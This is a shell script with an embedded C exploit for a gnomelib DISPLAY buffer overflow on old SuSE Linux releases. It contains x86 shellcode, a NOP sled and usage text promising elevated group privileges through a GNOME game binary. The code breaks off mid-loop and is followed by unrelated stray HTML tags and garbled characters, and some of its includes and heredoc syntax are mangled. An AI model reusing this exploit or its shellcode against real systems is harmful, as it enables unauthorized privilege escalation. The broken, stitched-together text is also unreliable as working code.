#!/bin/sh # # Gnomelib exploit by bladi & aLmUDeNa # # All gnome apps have an exploitable buffer overflow # (gnomelib) when get DISPLAY environment variable. # # Affected: # S.u.S.E. Linux 6.4 # S.u.S.E. Linux 6.3 # # Bueno un saludo a todos los que nos conocen/quieren/odian, # bueno ya llevamos 6 meses y esperamos que dure mucho mas ;* # # bladi@euskalnet.net # almudena@hempcultivation.com cat > /tmp/6M.c < gnomelib.c <<_EOF_ #include #include #define NOP 0x90 #define RANFROM -1400 #define RANTO -300 int i,x; char *ptr; unsigned long *ptr2; char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/6M"; char buffer[164]; main(int argc, char *argv[]) { long get_sp(void) { __asm__("movl %esp,%eax\n"); } printf (" jpuff ver: 1.0 \n"); printf (" by \n"); printf (" bladi & aLmUDeNa\n\n"); if (argc < 2 ) { printf(" Usage ./jpuff \n"); printf(" Try: ./jpuff /opt/gnome/bin/sol => you gain gid=40(game)\n"); exit(1); } for (x=RANFROM;x
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            ÑÇÖÞÅ·ÃÀÔÚÏß